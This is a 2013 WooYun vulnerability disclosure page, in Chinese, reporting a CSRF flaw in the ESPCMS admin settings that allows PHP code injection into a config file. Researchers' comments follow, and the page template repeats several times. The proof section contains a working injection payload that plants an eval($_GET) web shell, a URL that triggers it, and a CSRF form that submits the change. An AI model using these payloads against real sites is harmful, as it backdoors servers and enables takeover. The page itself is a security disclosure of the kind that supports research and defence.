代码审计系列4: 易思ESPCMS后台功能CSRF导致PHP代码执行

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-038391

漏洞标题：代码审计系列4: 易思ESPCMS后台功能CSRF导致PHP代码执行

漏洞作者： LaiX

提交时间：2013-09-28 11:39

修复时间：2013-12-24 11:40

公开时间：2013-12-24 11:40

漏洞类型：CSRF

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2013-09-28：细节已通知厂商并且等待厂商处理中
2013-10-08：厂商主动忽略漏洞，细节向第三方安全合作伙伴开放
2013-12-02：细节向核心白帽子及相关领域专家公开
2013-12-12：细节向普通白帽子公开
2013-12-22：细节向实习白帽子公开
2013-12-24：细节向公众公开

简要描述：

暂无

详细说明：

这是一个后台GETSHELL的漏洞，但是由于该程序没有对CSRF进行防御，所以可以导致CSRF直接GETshell，并且加重危害

漏洞证明：

问题页面：后台-系统设置-网站基本参数设置
对输入的数据并没有进行太过严格的过滤可以导致直接写入恶意PHP代码进配置文件
这里我们来测试一下'网站名称'这一项。
我们构造：

',//hello

保存之后，我们来看看(command.php)

然后我们进一步构造：

',);eval($_GET['x']);$CONFIG=Array(//

保存之后，我们来看看(command.php)

看起来没问题，我们试着访问

http://127.0.0.1:8080/espcms/datacache/command.php?x=phpinfo();

接下来给出CSRF的测试代码

<form id='test_form' action='http://127.0.0.1:8080/espcms/adminsoft/index.php?archive=management&action=setsave' method='POST' >
   <input type='hidden' name='sitename' value='getshell啦' >
   <input type='submit' name='submit' value='submit' >
</form>

修复方案：

过滤严格一点吧

版权声明：转载请注明来源 LaiX@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2013-12-24 11:40

厂商回复：

漏洞评价：

2013-10-09 20:35 | LaiX ( 普通白帽子 | Rank:128 漏洞数:39 | 承接建站、仿站、维护、反黑客、代码审计...)

靠都已经自动忽略了赶紧来认领啊，不行！！求补偿！！
2013-10-10 10:18 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

@LaiX 同情一下
2013-10-12 09:17 | LaiX ( 普通白帽子 | Rank:128 漏洞数:39 | 承接建站、仿站、维护、反黑客、代码审计...)

@wefgod 感觉不会再爱了
2013-10-12 09:18 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

@LaiX 辛苦了！
2013-10-25 15:11 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

这个好像还不错啊
2013-12-15 18:49 | neal ( 普通白帽子 | Rank:219 漏洞数:23 )

骚年为什么不考虑gpc
2013-12-24 18:57 | LaiX ( 普通白帽子 | Rank:128 漏洞数:39 | 承接建站、仿站、维护、反黑客、代码审计...)

@neal 你是来关注安全的，还是来反驳我达到装逼目的的。不管有没有开，并不代表漏洞不存在。
2014-07-17 20:33 | sec_jtn ( 普通白帽子 | Rank:134 漏洞数:56 | 本想无耻的刷rank，最后发现是我想太多了。...)

@LaiX 大牛可以把这句话改为签名了你是来关注安全的，还是来反驳我达到装逼目的的。不管有没有开，并不代表漏洞不存在。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-038391

漏洞标题：代码审计系列4: 易思ESPCMS后台功能CSRF导致PHP代码执行

相关厂商：易思ESPCMS企业网站管理系统

漏洞作者： LaiX

提交时间：2013-09-28 11:39

修复时间：2013-12-24 11:40

公开时间：2013-12-24 11:40

漏洞类型：CSRF

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 LaiX@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-038391

漏洞标题：代码审计系列4: 易思ESPCMS后台功能CSRF导致PHP代码执行

相关厂商：易思ESPCMS企业网站管理系统

漏洞作者： LaiX

提交时间：2013-09-28 11:39

修复时间：2013-12-24 11:40

公开时间：2013-12-24 11:40

漏洞类型：CSRF

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2013-038391"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 LaiX@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：